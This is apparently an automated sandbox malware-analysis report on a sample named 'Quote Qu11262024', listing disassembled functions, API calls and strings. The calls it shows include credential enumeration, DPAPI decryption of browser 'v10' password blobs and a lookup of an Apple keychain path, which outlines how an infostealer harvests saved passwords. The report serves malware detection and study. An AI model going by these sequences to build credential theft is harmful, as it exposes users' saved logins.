                                                                                                    • API String ID: 708747863-2348828428
                                                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                    • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                    • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 773 40b58d-40b59e 774 40b5a4-40b5c0 GetModuleHandleW FindResourceW 773->774 775 40b62e-40b632 773->775 776 40b5c2-40b5ce LoadResource 774->776 777 40b5e7 774->777 776->777 778 40b5d0-40b5e5 SizeofResource LockResource 776->778 779 40b5e9-40b5eb 777->779 778->779 779->775 780 40b5ed-40b5ef 779->780 780->775 781 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 780->781 781->775
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                    • String ID: AE$BIN
                                                                                                    • API String ID: 1668488027-3931574542
                                                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 767404330-0
                                                                                                    • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                    • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1690352074-0
                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoSystemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3558857096-0
                                                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                    • API String ID: 2744995895-28296030
                                                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                    • String ID: chp$v10
                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                    • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                    • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
